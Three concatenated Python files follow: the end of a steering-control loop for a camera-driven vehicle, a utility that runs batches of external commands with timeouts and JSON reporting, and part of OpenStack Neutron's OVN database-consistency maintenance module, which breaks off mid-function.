gpCam = GoProCamera.GoPro()
cap = VideoCapture("udp://127.0.0.1:10000")
out = cv2.VideoWriter('driving_outputs/'+VIDEO_NAME,cv2.VideoWriter_fourcc('M','P','4','V'), 60, (224,224))
time.sleep(1)  # let the stream settle before the first read
#%%
# Main control loop: read frame -> predict steering -> actuate, until 'q'.
while True:
    t = time.time()
    # NOTE(review): this unpack requires VideoCapture.read() to return a
    # (ret, frame) pair — confirm.
    ret, frame = cap.read()
    try:
        steering_angle, overlaid = agent.predict(frame, visualize=True)
    except Exception as e:
        # prediction failures (e.g. empty frame) are printed and skipped
        print(e)
        time.sleep(0.1)
        continue
    controller.move(steering_angle*MOVE_COEFF, steering_angle*MOVE_COEFF)
    cv2.imshow("overlaid", cv2.resize(overlaid, (512, 512)))
    out.write(overlaid)
    if cv2.waitKey(1) & 0xFF == ord('q'):
        break
    print(f"fps={1/(time.time()-t)} overlaid.shape={overlaid.shape}")
out.release()
cap.release()
cv2.destroyAllWindows()
# %%
|
timed_run.py
|
import datetime
import os
import json
import subprocess
import threading
import time
class TimedRun:
    """A run of an external process, with a timeout.

    Call start() to begin running, then periodically call check()
    to detect when it is done or terminate it if it times out, e.g.:

        run = TimedRun(cmd, 1000)
        run.start()
        while True:
            time.sleep(1)
            if run.check() != TimedRun.RUNNING:
                break
    """
    COMPLETED = 1
    RUNNING = 0
    TIMEDOUT = 2

    def __init__(self, cmd, timeout=60, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL):
        """Constructor.

        Args:
            cmd -- command line spec, as passed to subprocess.Popen
            timeout -- timeout in seconds
            stdout -- destination for the child's stdout (default: discarded)
            stderr -- destination for the child's stderr (default: discarded)
        """
        self.cmd = cmd
        self.stdoutf = stdout
        self.stderrf = stderr
        self.timeout = timeout
        self.start_time = None   # wall-clock start, set by start() and _run()
        self.end_time = None     # wall-clock end, set by _run() on exit
        self.process = None      # subprocess.Popen handle, created in _run()
        self.thread = None       # worker thread driving the subprocess
        self.result = None       # COMPLETED / TIMEDOUT once known
        self.retcode = None      # child's return code once it exits
        self.stdout = None
        self.stderr = None

    def __del__(self):
        """Destructor: ensure the child and worker thread are cleaned up."""
        if self.process is not None:
            self.process.terminate()
        if self.thread is not None:
            self.thread.join()

    def longname(self):
        """Returns the cmd, strung together."""
        return ' '.join(self.cmd)

    def tabname(self, limit=100):
        """Returns a table-appropriate representation of the run.

        Assumes cmd has at least three entries (solver, target, outpath).
        """
        solver = os.path.basename(self.cmd[0])
        target = os.path.basename(self.cmd[1])[:40]
        outdir = os.path.dirname(self.cmd[2])[:40]
        args = ' '.join(self.cmd[3:])
        ret = '{} {:<40} -> {:<30} | {}'.format(solver, target, outdir, args)
        return ret[:limit]

    def elapsed(self):
        """Total running time so far (in seconds); 0.0 before start()."""
        # BUG FIX: calling elapsed() before start() used to raise TypeError
        # (None arithmetic).
        if self.start_time is None:
            return 0.0
        if self.end_time is None:
            return time.time() - self.start_time
        return self.end_time - self.start_time

    def completed(self):
        """True iff the run completed without timing out."""
        return self.result == self.COMPLETED

    def start(self):
        """Start running the command (returns immediately)."""
        self.start_time = time.time()
        self.thread = threading.Thread(target=self._run)
        self.thread.start()

    def stop(self):
        """Terminate an ongoing process, whether it's done or not."""
        # BUG FIX: the worker thread may not have spawned the process yet
        # (timeout shorter than process startup) — guard against None
        # instead of raising AttributeError.
        if self.process is not None:
            self.process.terminate()
        if self.thread is not None:
            self.thread.join()

    def check(self):
        """Check for completion/timeout state; returns one of the class
        constants (COMPLETED / RUNNING / TIMEDOUT)."""
        self.thread.join(0)  # non-blocking liveness probe
        if not self.thread.is_alive():
            self.result = self.COMPLETED
            return self.COMPLETED
        elif self.elapsed() > self.timeout:
            self.stop()
            self.result = self.TIMEDOUT
            return self.TIMEDOUT
        else:
            return self.RUNNING

    def to_dict(self):
        """Returns a jsonifiable dict of the main results."""
        ret = {}
        ret['command_line'] = self.cmd
        ret['elapsed_time'] = self.elapsed()
        ret['return_code'] = self.retcode
        if self.result == self.COMPLETED:
            ret['result'] = 'OK'
        else:
            ret['result'] = 'TIMEOUT'
        return ret

    def _run(self):
        """Thread worker function (do not call directly)."""
        self.start_time = time.time()
        self.process = subprocess.Popen(self.cmd, stdout=self.stdoutf, stderr=self.stderrf)
        self.process.wait()
        self.end_time = time.time()
        self.retcode = self.process.returncode
class TimedRunBatch:
    """A batch of timed runs, using a configurable number of threads."""
    def __init__(self, cmds, timeout=60, thread_count=1, poll_period=1.0, outfiles=None):
        """Constructor.

        Args:
            cmds -- list of command line specs
            timeout -- timeout in seconds (same for every process)
            thread_count -- max number of simultaneous runs
            poll_period -- how often to poll ongoing runs, in seconds
            outfiles -- optional list of per-run stdout paths, parallel to cmds
        """
        self.cmds = cmds
        self.outfiles = outfiles
        self.timeout = timeout
        self.thread_count = thread_count
        self.poll_period = poll_period
        self.done = []      # finished TimedRun objects, in completion order
        self.underway = []  # currently-running TimedRun objects
    def run(self):
        """Run the batch (blocks until every command has finished)."""
        while len(self.done) != len(self.cmds):
            # Check all current runs
            underway = []
            for run in self.underway:
                c = run.check()
                if c != TimedRun.RUNNING:
                    self.done.append(run)
                    self._on_done(run, c)
                else:
                    underway.append(run)
            self.underway = underway
            # Add new runs if there is room
            available = self.thread_count - len(self.underway)
            nextindex = len(self.done) + len(self.underway)
            unstarted = len(self.cmds) - nextindex
            startable = min(unstarted, available)
            for i in range(startable):
                index = nextindex + i
                cmd = self.cmds[index]
                if self.outfiles is not None:
                    # NOTE(review): this handle is never explicitly closed;
                    # it stays open until the TimedRun is garbage collected.
                    outfile = open(self.outfiles[index], 'w')
                    run = TimedRun(cmd, self.timeout, outfile)
                else:
                    run = TimedRun(cmd, self.timeout)
                run.start()
                self.underway.append(run)
                self._on_start(run)
            # Have a nap
            time.sleep(self.poll_period)
    def to_dict(self):
        """Returns a jsonifiable dict."""
        ret = {}
        ret['timeout'] = self.timeout
        ret['runs'] = [run.to_dict() for run in self.done]
        return ret
    def to_json(self, filename):
        """Writes the results to JSON."""
        with open(filename, 'w') as f:
            ret = self.to_dict()
            json.dump(ret, f)
    def _on_start(self, run):
        """Called when a run is started (hook for subclasses)."""
    def _on_done(self, run, result):
        """Called when a run completes; prints a one-line progress report."""
        when = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
        what = run.tabname(160)
        rslt = run.retcode if run.completed() else 'TIMEOUT'
        wait = run.elapsed()
        done = len(self.done)
        total = len(self.cmds)
        print('{} {:<120} {:>7} in {:8.2f} s. {:>3}/{:>3} done'.format(when, what, rslt, wait, done, total))
class TimedRunBatchPW(TimedRunBatch):
    """A timed run batch that persists partial results after every run."""

    def __init__(self, cmds, outfile, *args, **kwargs):
        """Constructor.
        Args:
            cmds -- list of command line specs
            outfile -- file where partial results are output
            args, kwargs -- passed to TimedRunBatch constructor
        """
        super().__init__(cmds, *args, **kwargs)
        self.partial_outfile = outfile

    def _on_done(self, run, result):
        """Report the finished run, then dump everything done so far."""
        super()._on_done(run, result)
        self.to_json(self.partial_outfile)
|
maintenance.py
|
# Copyright 2019 Red Hat, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import abc
import inspect
import threading
from futurist import periodics
from neutron_lib.api.definitions import external_net
from neutron_lib.api.definitions import segment as segment_def
from neutron_lib import constants as n_const
from neutron_lib import context as n_context
from neutron_lib import exceptions as n_exc
from oslo_config import cfg
from oslo_log import log
from oslo_utils import timeutils
from ovsdbapp.backend.ovs_idl import event as row_event
from neutron.common.ovn import constants as ovn_const
from neutron.common.ovn import utils
from neutron.conf.plugins.ml2.drivers.ovn import ovn_conf
from neutron.db import ovn_hash_ring_db as hash_ring_db
from neutron.db import ovn_revision_numbers_db as revision_numbers_db
from neutron.db import segments_db
from neutron.plugins.ml2.drivers.ovn.mech_driver.ovsdb import ovn_db_sync
CONF = cfg.CONF
LOG = log.getLogger(__name__)

# How often (in seconds) the Neutron/OVN DB consistency check runs.
DB_CONSISTENCY_CHECK_INTERVAL = 300  # 5 minutes

# Labels used when logging the two kinds of DB inconsistencies.
INCONSISTENCY_TYPE_CREATE_UPDATE = 'create/update'
INCONSISTENCY_TYPE_DELETE = 'delete'
class MaintenanceThread(object):
    """Runs registered periodic tasks on a dedicated daemon thread."""

    def __init__(self):
        # (callable, args, kwargs) tuples, as expected by PeriodicWorker.
        self._callables = []
        self._thread = None
        self._worker = None

    def add_periodics(self, obj):
        """Register every periodic-decorated method found on *obj*."""
        for attr_name, attr in inspect.getmembers(obj):
            if not periodics.is_periodic(attr):
                continue
            LOG.debug('Periodic task found: %(owner)s.%(member)s',
                      {'owner': obj.__class__.__name__, 'member': attr_name})
            self._callables.append((attr, (), {}))

    def start(self):
        """Spawn the worker thread (no-op if it is already running)."""
        if self._thread is not None:
            return
        self._worker = periodics.PeriodicWorker(self._callables)
        self._thread = threading.Thread(target=self._worker.start)
        self._thread.daemon = True
        self._thread.start()

    def stop(self):
        """Stop the worker, wait for it, and join its thread."""
        self._worker.stop()
        self._worker.wait()
        self._thread.join()
        self._worker = self._thread = None
def rerun_on_schema_updates(func):
    """Flag *func* to be re-invoked whenever the NB database schema changes.

    Used as a decorator; returns *func* unchanged apart from the marker
    attribute that SchemaAwarePeriodicsBase looks for.
    """
    setattr(func, '_rerun_on_schema_updates', True)
    return func
class OVNNBDBReconnectionEvent(row_event.RowEvent):
    """Event listening to reconnections from OVN Northbound DB."""

    def __init__(self, driver, version):
        self.driver = driver
        self.version = version
        # A row created in the 'Connection' table signals a reconnection.
        super(OVNNBDBReconnectionEvent, self).__init__(
            (self.ROW_CREATE,), 'Connection', None)
        self.event_name = self.__class__.__name__

    def run(self, event, row, old):
        """If the schema version changed across the reconnection, notify."""
        new_version = self.driver.get_ovn_nbdb_version()
        if self.version == new_version:
            return
        self.driver.nbdb_schema_updated_hook()
        self.version = new_version
class SchemaAwarePeriodicsBase(object):
    """Base for periodic-task classes that react to NB schema updates.

    On construction it collects the methods flagged with
    @rerun_on_schema_updates and registers an OVNNBDBReconnectionEvent so
    nbdb_schema_updated_hook() fires when a reconnection reveals a new
    Northbound database schema version.
    """

    def __init__(self, ovn_client):
        self._nb_idl = ovn_client._nb_idl
        self._set_schema_aware_periodics()
        reconnection_event = OVNNBDBReconnectionEvent(
            self, self.get_ovn_nbdb_version())
        self._nb_idl.idl.notify_handler.watch_event(reconnection_event)

    def get_ovn_nbdb_version(self):
        """Return the schema version of the connected NB database."""
        return self._nb_idl.idl._db.version

    def _set_schema_aware_periodics(self):
        """Collect bound periodic methods marked @rerun_on_schema_updates."""
        self._schema_aware_periodics = []
        for attr_name, attr in inspect.getmembers(self):
            if not inspect.ismethod(attr):
                continue
            if not (getattr(attr, '_rerun_on_schema_updates', None) and
                    periodics.is_periodic(attr)):
                continue
            LOG.debug('Schema aware periodic task found: '
                      '%(owner)s.%(member)s',
                      {'owner': self.__class__.__name__, 'member': attr_name})
            self._schema_aware_periodics.append(attr)

    @abc.abstractmethod
    def nbdb_schema_updated_hook(self):
        """Hook invoked upon OVN NB schema is updated."""
class DBInconsistenciesPeriodics(SchemaAwarePeriodicsBase):
    """Periodic tasks that detect and repair Neutron/OVN DB inconsistencies.

    One instance runs per neutron-server worker; an OVSDB lock
    ('ovn_db_inconsistencies_periodics') ensures only the lock holder
    actually performs the fix-up work. Most one-shot checks raise
    periodics.NeverAgain() once they have completed.
    """

    def __init__(self, ovn_client):
        self._ovn_client = ovn_client
        # FIXME(lucasagomes): We should not be accessing private
        # attributes like that, perhaps we should extend the OVNClient
        # class and create an interface for the locks ?
        self._nb_idl = self._ovn_client._nb_idl
        self._sb_idl = self._ovn_client._sb_idl
        self._idl = self._nb_idl.idl
        self._idl.set_lock('ovn_db_inconsistencies_periodics')
        self._sync_timer = timeutils.StopWatch()
        super(DBInconsistenciesPeriodics, self).__init__(ovn_client)
        # Maps each resource type to the callables used to read it from
        # Neutron and to read/create/update/delete it in OVN.
        self._resources_func_map = {
            ovn_const.TYPE_NETWORKS: {
                'neutron_get': self._ovn_client._plugin.get_network,
                'ovn_get': self._nb_idl.get_lswitch,
                'ovn_create': self._ovn_client.create_network,
                'ovn_update': self._ovn_client.update_network,
                'ovn_delete': self._ovn_client.delete_network,
            },
            ovn_const.TYPE_PORTS: {
                'neutron_get': self._ovn_client._plugin.get_port,
                'ovn_get': self._nb_idl.get_lswitch_port,
                'ovn_create': self._ovn_client.create_port,
                'ovn_update': self._ovn_client.update_port,
                'ovn_delete': self._ovn_client.delete_port,
            },
            ovn_const.TYPE_FLOATINGIPS: {
                'neutron_get': self._ovn_client._l3_plugin.get_floatingip,
                'ovn_get': self._nb_idl.get_floatingip_in_nat_or_lb,
                'ovn_create': self._create_floatingip_and_pf,
                'ovn_update': self._update_floatingip_and_pf,
                'ovn_delete': self._delete_floatingip_and_pf,
            },
            ovn_const.TYPE_ROUTERS: {
                'neutron_get': self._ovn_client._l3_plugin.get_router,
                'ovn_get': self._nb_idl.get_lrouter,
                'ovn_create': self._ovn_client.create_router,
                'ovn_update': self._ovn_client.update_router,
                'ovn_delete': self._ovn_client.delete_router,
            },
            # NOTE: security groups and SG rules have no 'ovn_update' entry;
            # _fix_create_update handles those types specially.
            ovn_const.TYPE_SECURITY_GROUPS: {
                'neutron_get': self._ovn_client._plugin.get_security_group,
                'ovn_get': self._nb_idl.get_port_group,
                'ovn_create': self._ovn_client.create_security_group,
                'ovn_delete': self._ovn_client.delete_security_group,
            },
            ovn_const.TYPE_SECURITY_GROUP_RULES: {
                'neutron_get':
                    self._ovn_client._plugin.get_security_group_rule,
                'ovn_get': self._nb_idl.get_acl_by_id,
                'ovn_create': self._ovn_client.create_security_group_rule,
                'ovn_delete': self._ovn_client.delete_security_group_rule,
            },
            ovn_const.TYPE_ROUTER_PORTS: {
                'neutron_get':
                    self._ovn_client._plugin.get_port,
                'ovn_get': self._nb_idl.get_lrouter_port,
                'ovn_create': self._create_lrouter_port,
                'ovn_update': self._ovn_client.update_router_port,
                'ovn_delete': self._ovn_client.delete_router_port,
            },
        }

    @property
    def has_lock(self):
        """True when this worker's OVSDB lock is not contended."""
        return not self._idl.is_lock_contended

    def nbdb_schema_updated_hook(self):
        """Re-run all schema-aware periodics after an NB schema update."""
        if not self.has_lock:
            return
        for func in self._schema_aware_periodics:
            LOG.debug('OVN Northbound DB schema version was updated,'
                      'invoking "%s"', func.__name__)
            try:
                func()
            except periodics.NeverAgain:
                pass
            except Exception:
                LOG.exception(
                    'Unknown error while executing "%s"', func.__name__)

    def _fix_create_update(self, context, row):
        """Create or update one resource in OVN to match the Neutron DB.

        *row* is an entry from the revision-numbers table describing an
        inconsistent resource.
        """
        res_map = self._resources_func_map[row.resource_type]
        try:
            # Get the latest version of the resource in Neutron DB
            n_obj = res_map['neutron_get'](context, row.resource_uuid)
        except n_exc.NotFound:
            LOG.warning('Skip fixing resource %(res_uuid)s (type: '
                        '%(res_type)s). Resource does not exist in Neutron '
                        'database anymore', {'res_uuid': row.resource_uuid,
                                             'res_type': row.resource_type})
            return

        ovn_obj = res_map['ovn_get'](row.resource_uuid)

        if not ovn_obj:
            res_map['ovn_create'](context, n_obj)
        else:
            if row.resource_type == ovn_const.TYPE_SECURITY_GROUP_RULES:
                LOG.error("SG rule %s found with a revision number while "
                          "this resource doesn't support updates",
                          row.resource_uuid)
            elif row.resource_type == ovn_const.TYPE_SECURITY_GROUPS:
                # In OVN, we don't care about updates to security groups,
                # so just bump the revision number to whatever it's
                # supposed to be.
                revision_numbers_db.bump_revision(context, n_obj,
                                                  row.resource_type)
            else:
                ext_ids = getattr(ovn_obj, 'external_ids', {})
                ovn_revision = int(ext_ids.get(
                    ovn_const.OVN_REV_NUM_EXT_ID_KEY, -1))
                # If the resource exist in the OVN DB but the revision
                # number is different from Neutron DB, updated it.
                if ovn_revision != n_obj['revision_number']:
                    res_map['ovn_update'](context, n_obj)
                else:
                    # If the resource exist and the revision number
                    # is equal on both databases just bump the revision on
                    # the cache table.
                    revision_numbers_db.bump_revision(context, n_obj,
                                                      row.resource_type)

    def _fix_delete(self, context, row):
        """Delete one resource from OVN (or only its stale revision row)."""
        res_map = self._resources_func_map[row.resource_type]
        ovn_obj = res_map['ovn_get'](row.resource_uuid)
        if not ovn_obj:
            # Already gone from OVN; just clean up the bookkeeping entry.
            revision_numbers_db.delete_revision(
                context, row.resource_uuid, row.resource_type)
        else:
            res_map['ovn_delete'](context, row.resource_uuid)

    def _fix_create_update_subnet(self, context, row):
        """Create or update a subnet's OVN DHCP options from the Neutron DB."""
        # Get the latest version of the subnet (and its network) in Neutron DB
        sn_db_obj = self._ovn_client._plugin.get_subnet(
            context, row.resource_uuid)
        n_db_obj = self._ovn_client._plugin.get_network(
            context, sn_db_obj['network_id'])

        if row.revision_number == ovn_const.INITIAL_REV_NUM:
            self._ovn_client.create_subnet(context, sn_db_obj, n_db_obj)
        else:
            self._ovn_client.update_subnet(context, sn_db_obj, n_db_obj)

    # The migration will run just once per neutron-server instance. If the lock
    # is held by some other neutron-server instance in the cloud, we'll attempt
    # to perform the migration every 10 seconds until completed.
    # TODO(jlibosva): Remove the migration to port groups at some point. It's
    # been around since Queens release so it is good to drop this soon.
    @periodics.periodic(spacing=10, run_immediately=True)
    @rerun_on_schema_updates
    def migrate_to_port_groups(self):
        """Perform the migration from Address Sets to Port Groups. """
        # TODO(dalvarez): Remove this in U cycle when we're sure that all
        # versions are running using Port Groups (and OVS >= 2.10).

        # If Port Groups are not supported or we've already migrated, we don't
        # need to attempt to migrate again.
        if not self._nb_idl.get_address_sets():
            raise periodics.NeverAgain()

        # Only the worker holding a valid lock within OVSDB will perform the
        # migration.
        if not self.has_lock:
            return

        admin_context = n_context.get_admin_context()
        nb_sync = ovn_db_sync.OvnNbSynchronizer(
            self._ovn_client._plugin, self._nb_idl, self._ovn_client._sb_idl,
            None, None)
        nb_sync.migrate_to_port_groups(admin_context)
        raise periodics.NeverAgain()

    def _log_maintenance_inconsistencies(self, create_update_inconsistencies,
                                         delete_inconsistencies):
        """Debug-log per-resource-type counts of the found inconsistencies."""
        if not CONF.debug:
            return

        def _log(inconsistencies, type_):
            if not inconsistencies:
                return

            c = {}
            for f in inconsistencies:
                if f.resource_type not in c:
                    c[f.resource_type] = 1
                else:
                    c[f.resource_type] += 1

            fail_str = ', '.join('{}={}'.format(k, v) for k, v in c.items())
            LOG.debug('Maintenance task: Number of inconsistencies '
                      'found at %(type_)s: %(fail_str)s',
                      {'type_': type_, 'fail_str': fail_str})

        _log(create_update_inconsistencies, INCONSISTENCY_TYPE_CREATE_UPDATE)
        _log(delete_inconsistencies, INCONSISTENCY_TYPE_DELETE)

    @periodics.periodic(spacing=DB_CONSISTENCY_CHECK_INTERVAL,
                        run_immediately=True)
    def check_for_inconsistencies(self):
        """Find out-of-sync resources and replay them into OVN."""
        # Only the worker holding a valid lock within OVSDB will run
        # this periodic
        if not self.has_lock:
            return

        admin_context = n_context.get_admin_context()
        create_update_inconsistencies = (
            revision_numbers_db.get_inconsistent_resources(admin_context))
        delete_inconsistencies = (
            revision_numbers_db.get_deleted_resources(admin_context))
        if not any([create_update_inconsistencies, delete_inconsistencies]):
            LOG.debug('Maintenance task: No inconsistencies found. Skipping')
            return

        LOG.debug('Maintenance task: Synchronizing Neutron '
                  'and OVN databases')
        self._log_maintenance_inconsistencies(create_update_inconsistencies,
                                              delete_inconsistencies)
        self._sync_timer.restart()

        dbg_log_msg = ('Maintenance task: Fixing resource %(res_uuid)s '
                       '(type: %(res_type)s) at %(type_)s')
        # Fix the create/update resources inconsistencies
        for row in create_update_inconsistencies:
            LOG.debug(dbg_log_msg, {'res_uuid': row.resource_uuid,
                                    'res_type': row.resource_type,
                                    'type_': INCONSISTENCY_TYPE_CREATE_UPDATE})
            try:
                # NOTE(lucasagomes): The way to fix subnets is bit
                # different than other resources. A subnet in OVN language
                # is just a DHCP rule but, this rule only exist if the
                # subnet in Neutron has the "enable_dhcp" attribute set
                # to True. So, it's possible to have a consistent subnet
                # resource even when it does not exist in the OVN database.
                if row.resource_type == ovn_const.TYPE_SUBNETS:
                    self._fix_create_update_subnet(admin_context, row)
                else:
                    self._fix_create_update(admin_context, row)
            except Exception:
                LOG.exception('Maintenance task: Failed to fix resource '
                              '%(res_uuid)s (type: %(res_type)s)',
                              {'res_uuid': row.resource_uuid,
                               'res_type': row.resource_type})

        # Fix the deleted resources inconsistencies
        for row in delete_inconsistencies:
            LOG.debug(dbg_log_msg, {'res_uuid': row.resource_uuid,
                                    'res_type': row.resource_type,
                                    'type_': INCONSISTENCY_TYPE_DELETE})
            try:
                if row.resource_type == ovn_const.TYPE_SUBNETS:
                    self._ovn_client.delete_subnet(admin_context,
                                                   row.resource_uuid)
                else:
                    self._fix_delete(admin_context, row)
            except Exception:
                LOG.exception('Maintenance task: Failed to fix deleted '
                              'resource %(res_uuid)s (type: %(res_type)s)',
                              {'res_uuid': row.resource_uuid,
                               'res_type': row.resource_type})

        self._sync_timer.stop()
        LOG.info('Maintenance task: Synchronization finished '
                 '(took %.2f seconds)', self._sync_timer.elapsed())

    def _create_lrouter_port(self, context, port):
        """Re-attach a Neutron router interface so its LRouter port exists."""
        router_id = port['device_id']
        iface_info = self._ovn_client._l3_plugin._add_neutron_router_interface(
            context, router_id, {'port_id': port['id']}, may_exist=True)
        self._ovn_client.create_router_port(context, router_id, iface_info)

    def _check_subnet_global_dhcp_opts(self):
        """Return DHCP-enabled subnets whose OVN options diverge from config."""
        inconsistent_subnets = []
        admin_context = n_context.get_admin_context()
        subnet_filter = {'enable_dhcp': [True]}
        neutron_subnets = self._ovn_client._plugin.get_subnets(
            admin_context, subnet_filter)
        global_v4_opts = ovn_conf.get_global_dhcpv4_opts()
        global_v6_opts = ovn_conf.get_global_dhcpv6_opts()
        LOG.debug('Checking %s subnets for global DHCP option consistency',
                  len(neutron_subnets))
        for subnet in neutron_subnets:
            ovn_dhcp_opts = self._nb_idl.get_subnet_dhcp_options(
                subnet['id'])['subnet']
            inconsistent_opts = []
            if ovn_dhcp_opts:
                if subnet['ip_version'] == n_const.IP_VERSION_4:
                    for opt, value in global_v4_opts.items():
                        if value != ovn_dhcp_opts['options'].get(opt, None):
                            inconsistent_opts.append(opt)
                if subnet['ip_version'] == n_const.IP_VERSION_6:
                    for opt, value in global_v6_opts.items():
                        if value != ovn_dhcp_opts['options'].get(opt, None):
                            inconsistent_opts.append(opt)
            if inconsistent_opts:
                LOG.debug('Subnet %s has inconsistent DHCP opts: %s',
                          subnet['id'], inconsistent_opts)
                inconsistent_subnets.append(subnet)
        return inconsistent_subnets

    def _create_floatingip_and_pf(self, context, floatingip):
        """Create the floating IP plus its port-forwarding entries in OVN."""
        self._ovn_client.create_floatingip(context, floatingip)
        self._ovn_client._l3_plugin.port_forwarding.maintenance_create(
            context, floatingip)

    def _update_floatingip_and_pf(self, context, floatingip):
        """Update the floating IP plus its port-forwarding entries in OVN."""
        self._ovn_client.update_floatingip(context, floatingip)
        self._ovn_client._l3_plugin.port_forwarding.maintenance_update(
            context, floatingip)

    def _delete_floatingip_and_pf(self, context, fip_id):
        """Delete the port-forwarding entries, then the floating IP, in OVN."""
        self._ovn_client._l3_plugin.port_forwarding.maintenance_delete(
            context, fip_id)
        self._ovn_client.delete_floatingip(context, fip_id)

    # A static spacing value is used here, but this method will only run
    # once per lock due to the use of periodics.NeverAgain().
    @periodics.periodic(spacing=600,
                        run_immediately=True)
    def check_global_dhcp_opts(self):
        """One-shot: re-apply configured global DHCP options to subnets."""
        # This periodic task is included in DBInconsistenciesPeriodics since
        # it uses the lock to ensure only one worker is executing
        if not self.has_lock:
            return
        if (not ovn_conf.get_global_dhcpv4_opts() and
                not ovn_conf.get_global_dhcpv6_opts()):
            # No need to scan the subnets if the settings are unset.
            raise periodics.NeverAgain()

        LOG.debug('Maintenance task: Checking DHCP options on subnets')
        self._sync_timer.restart()
        fix_subnets = self._check_subnet_global_dhcp_opts()
        if fix_subnets:
            admin_context = n_context.get_admin_context()
            LOG.debug('Triggering update for %s subnets', len(fix_subnets))
            for subnet in fix_subnets:
                neutron_net = self._ovn_client._plugin.get_network(
                    admin_context, subnet['network_id'])
                try:
                    self._ovn_client.update_subnet(admin_context, subnet,
                                                   neutron_net)
                except Exception:
                    LOG.exception('Failed to update subnet %s',
                                  subnet['id'])

        self._sync_timer.stop()
        LOG.info('Maintenance task: DHCP options check finished '
                 '(took %.2f seconds)', self._sync_timer.elapsed())

        raise periodics.NeverAgain()

    # A static spacing value is used here, but this method will only run
    # once per lock due to the use of periodics.NeverAgain().
    @periodics.periodic(spacing=1800, run_immediately=True)
    def check_metadata_ports(self):
        """One-shot: ensure every network has an OVN metadata port."""
        # If OVN metadata is disabled do not run this task again
        if not ovn_conf.is_ovn_metadata_enabled():
            raise periodics.NeverAgain()

        # Make sure that only one worker is executing this
        if not self.has_lock:
            return

        admin_context = n_context.get_admin_context()
        for n in self._ovn_client._plugin.get_networks(admin_context):
            self._ovn_client.create_metadata_port(admin_context, n)

        raise periodics.NeverAgain()

    # TODO(lucasagomes): Remove this in the U cycle
    # A static spacing value is used here, but this method will only run
    # once per lock due to the use of periodics.NeverAgain().
    @periodics.periodic(spacing=600, run_immediately=True)
    def check_for_port_security_unknown_address(self):
        """One-shot: fix the 'unknown' address entry on switch ports."""
        if not self.has_lock:
            return

        for port in self._nb_idl.lsp_list().execute(check_error=True):
            if port.type == ovn_const.LSP_TYPE_LOCALNET:
                continue

            addresses = port.addresses
            type_ = port.type.strip()
            # Ports without port security must carry the 'unknown' address
            # (unless they have a special type); all others must not.
            if not port.port_security:
                if not type_ and ovn_const.UNKNOWN_ADDR not in addresses:
                    addresses.append(ovn_const.UNKNOWN_ADDR)
                elif type_ and ovn_const.UNKNOWN_ADDR in addresses:
                    addresses.remove(ovn_const.UNKNOWN_ADDR)
            else:
                if type_ and ovn_const.UNKNOWN_ADDR in addresses:
                    addresses.remove(ovn_const.UNKNOWN_ADDR)
                elif not type_ and ovn_const.UNKNOWN_ADDR in addresses:
                    addresses.remove(ovn_const.UNKNOWN_ADDR)

            if addresses:
                self._nb_idl.lsp_set_addresses(
                    port.name, addresses=addresses).execute(check_error=True)
            else:
                self._nb_idl.db_clear(
                    'Logical_Switch_Port', port.name,
                    'addresses').execute(check_error=True)

        raise periodics.NeverAgain()

    # A static spacing value is used here, but this method will only run
    # once per lock due to the use of periodics.NeverAgain().
    @periodics.periodic(spacing=600, run_immediately=True)
    def check_for_fragmentation_support(self):
        """One-shot: set the gateway MTU option on all external networks."""
        if not self.has_lock:
            return

        context = n_context.get_admin_context()
        for net in self._ovn_client._plugin.get_networks(
                context, {external_net.EXTERNAL: [True]}):
            self._ovn_client.set_gateway_mtu(context, net)

        raise periodics.NeverAgain()

    # A static spacing value is used here, but this method will only run
    # once per lock due to the use of periodics.NeverAgain().
    @periodics.periodic(spacing=600, run_immediately=True)
    def check_for_igmp_snoop_support(self):
        """One-shot: align mcast_snoop on all switches with configuration."""
        if not self.has_lock:
            return

        with self._nb_idl.transaction(check_error=True) as txn:
            value = ('true' if ovn_conf.is_igmp_snooping_enabled()
                     else 'false')
            for ls in self._nb_idl.ls_list().execute(check_error=True):
                if (ls.other_config.get(ovn_const.MCAST_SNOOP,
                                        None) == value or not ls.name):
                    continue
                txn.add(self._nb_idl.db_set(
                    'Logical_Switch', ls.name,
                    ('other_config', {
                        ovn_const.MCAST_SNOOP: value,
                        ovn_const.MCAST_FLOOD_UNREGISTERED: 'false'})))

        raise periodics.NeverAgain()

    # A static spacing value is used here, but this method will only run
    # once per lock due to the use of periodics.NeverAgain().
    @periodics.periodic(spacing=600, run_immediately=True)
    def check_for_ha_chassis_group_address(self):
        """One-shot: rebuild the default HA chassis group membership."""
        # If external ports is not supported stop running
        # this periodic task
        if not self._ovn_client.is_external_ports_supported():
            raise periodics.NeverAgain()

        if not self.has_lock:
            return

        default_ch_grp = self._nb_idl.ha_chassis_group_add(
            ovn_const.HA_CHASSIS_GROUP_DEFAULT_NAME, may_exist=True).execute(
            check_error=True)

        # NOTE(lucasagomes): Find the existing chassis with the highest
        # priority and keep it as being the highest to avoid moving
        # things around
        high_prio_ch = max(default_ch_grp.ha_chassis, key=lambda x: x.priority,
                           default=None)

        all_ch = self._sb_idl.get_all_chassis()
        gw_ch = self._sb_idl.get_gateway_chassis_from_cms_options()
        ch_to_del = set(all_ch) - set(gw_ch)

        with self._nb_idl.transaction(check_error=True) as txn:
            for ch in ch_to_del:
                txn.add(self._nb_idl.ha_chassis_group_del_chassis(
                    ovn_const.HA_CHASSIS_GROUP_DEFAULT_NAME, ch,
                    if_exists=True))

            # NOTE(lucasagomes): If the high priority chassis is in
            # the list of chassis to be added/updated. Add it first with
            # the highest priority number possible and then add the rest
            # (the priority of the rest of the chassis does not matter
            # since only the highest one is active)
            priority = ovn_const.HA_CHASSIS_GROUP_HIGHEST_PRIORITY
            if high_prio_ch and high_prio_ch.chassis_name in gw_ch:
                txn.add(self._nb_idl.ha_chassis_group_add_chassis(
                    ovn_const.HA_CHASSIS_GROUP_DEFAULT_NAME,
                    high_prio_ch.chassis_name, priority=priority))
                gw_ch.remove(high_prio_ch.chassis_name)
                priority -= 1

            for ch in gw_ch:
                txn.add(self._nb_idl.ha_chassis_group_add_chassis(
                    ovn_const.HA_CHASSIS_GROUP_DEFAULT_NAME,
                    ch, priority=priority))
